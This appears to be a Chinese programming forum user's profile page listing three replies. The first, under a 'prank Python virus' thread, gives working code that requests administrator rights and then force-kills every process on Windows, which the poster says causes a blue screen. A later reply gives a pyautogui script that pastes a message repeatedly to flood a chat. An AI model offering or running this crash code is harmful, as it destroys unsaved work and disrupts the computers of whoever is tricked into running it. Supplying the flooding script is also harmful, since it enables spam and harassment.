
Lv.1
随便写点什么吧~(50字符以内;注意避免暴露个人敏感信息,如手机/qq号等)
签名:博客:https://owugi7s6.netlify.app 666仅剩20天暑假就要离我而去了啊可我作业一笔没动欸 ↓下滑观看完整版大结局 骗你的老师把我语文数学生物作业免了哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈
在 恶搞:python病毒{千万别试啊} 中回复
from __future__ import print_function
import ctypes
import sys
import os
def is_admin():
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
if is_admin():
os.system("Taskkill /fi \"pid ge 1\" /f")
input()
else:
if sys.version_info[0] == 3:
ctypes.windll.shell32.ShellExecuteW(
None, "runas", sys.executable, __file__, None, 1)
else:
ctypes.windll.shell32.ShellExecuteW(None, u"runas", unicode(
sys.executable), unicode(__file__), None, 1)
真蓝屏~~
2022-12-07T11:35:06 点赞:0
在 【Python】作品自动评论 中回复
line 15
'cookie':cookie
^
SyntaxError: invalid syntax
进程已结束,退出代码1
what
2022-12-11T21:10:37 点赞:0
在 吉吉看看。我也是醉了。连发10条以上消息。,5分钟搞了n次! 中回复
import pyperclip
import pyautogui
a = pyautogui.prompt(text="发送的内容", title="输入", default="")
b = int(pyautogui.prompt(text="发送的次数", title="输入", default=""))
c = pyautogui.alert(text="请将光标放在输入框内", title="提示")
pyperclip.copy(a)
for i in range(b):
pyautogui.hotkey('ctrl','v')
pyautogui.hotkey('\n')
相同原理
2022-12-12T00:32:05 点赞:0